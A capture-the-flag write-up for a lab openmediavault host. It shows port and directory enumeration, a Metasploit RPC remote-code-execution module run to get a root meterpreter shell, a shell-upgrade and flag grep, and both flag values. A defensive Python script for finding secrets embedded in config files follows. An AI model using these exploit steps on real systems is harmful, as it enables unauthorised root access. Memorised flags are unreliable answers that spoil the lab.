FLAG1

0eec401289b483ffb2e3bcd5320f63dfb84ec765

FLAG2

d2213f1407809dfcbff2b1a3cc1ae7d72e88d643

Enumeration

PORT   STATE SERVICE VERSION
80/tcp open  http    nginx
|_http-title: openmediavault control panel - library.pwntilldawn.local
gobuster dir -u 10.150.150.111 -w /usr/share/wordlists/dirb/common.txt -q -t 200
/css                  (Status: 301) [Size: 178] [--> http://10.150.150.111/css/]
/favicon.ico          (Status: 200) [Size: 1406]
/fonts                (Status: 301) [Size: 178] [--> http://10.150.150.111/fonts/]
/js                   (Status: 301) [Size: 178] [--> http://10.150.150.111/js/]
/images               (Status: 301) [Size: 178] [--> http://10.150.150.111/images/]
/licenses             (Status: 301) [Size: 178] [--> http://10.150.150.111/licenses/]
/index.php            (Status: 200) [Size: 3419]
/rpc                  (Status: 301) [Size: 178] [--> http://10.150.150.111/rpc/]

Exploitation

Browsing to http://10.150.150.111/ showed the title openmediavault, and a quick search turned up this blog post: https://www.obrela.com/openmediavault-remote-code-execution-rce-vulnerability/

Seems like we can use Metasploit

use exploit/unix/webapp/openmediavault_rpc_rce
set RHOSTS 10.150.150.111
set LHOST tun0
run
meterpreter > shell
Process 38147 created.
Channel 1 created.
whoami
root

We can easily get FLAG1.txt under the /root directory:

0eec401289b483ffb2e3bcd5320f63dfb84ec765

FLAG2 is a pain

python3 -c "import pty;pty.spawn('/bin/bash')"
grep -rnw '/' -e 'FLAG2' 2>/dev/null
/etc/openmediavault/config.xml:307: <command>FLAG2=d2213f1407809dfcbff2b1a3cc1ae7d72e88d643</command>
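
From the defender's side, the FLAG2 hit above is a plaintext secret sitting inside a <command> element of /etc/openmediavault/config.xml. The following is an added example (not part of the original write-up or of openmediavault) showing one way to audit such a file for that pattern. The sample XML, its element layout, the BACKUP_TOKEN name and the find_embedded_secrets helper are constructed for illustration.

```python
import re
import xml.parsers.expat

# Constructed sample; element layout and the BACKUP_TOKEN name are assumptions.
SAMPLE_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<config>
  <system>
    <crontab>
      <job>
        <command>BACKUP_TOKEN=3f9a0c1d2e4b5a6978877665544332211000ffee</command>
      </job>
      <job>
        <command>/usr/sbin/logrotate /etc/logrotate.conf</command>
      </job>
    </crontab>
  </system>
</config>
"""

# NAME=value where the value is a long hex string (32+ characters).
SECRET_ASSIGNMENT = re.compile(r"\b([A-Za-z_][A-Za-z0-9_]*)=[A-Fa-f0-9]{32,}\b")


def find_embedded_secrets(xml_text, element="command"):
    """Return (line, variable_name) for each secret-like assignment in <element>."""
    findings = []
    state = {"inside": False, "line": 0, "text": []}
    parser = xml.parsers.expat.ParserCreate()

    def start(name, attrs):
        if name == element:
            # Remember the line of the opening tag so findings can be located.
            state.update(inside=True, line=parser.CurrentLineNumber, text=[])
    def chars(data):
        if state["inside"]:
            state["text"].append(data)
    def end(name):
        if name == element and state["inside"]:
            state["inside"] = False
            for match in SECRET_ASSIGNMENT.finditer("".join(state["text"])):
                # Report the variable name only, never the secret itself.
                findings.append((state["line"], match.group(1)))

    parser.StartElementHandler = start
    parser.CharacterDataHandler = chars
    parser.EndElementHandler = end
    parser.Parse(xml_text, True)
    return findings

if __name__ == "__main__":
    for line, name in find_embedded_secrets(SAMPLE_CONFIG):
        print(f"line {line}: <command> embeds a value for {name}")
```

Any finding is a value that should be moved out of the configuration file and rotated, since every account that can read the file can read the secret.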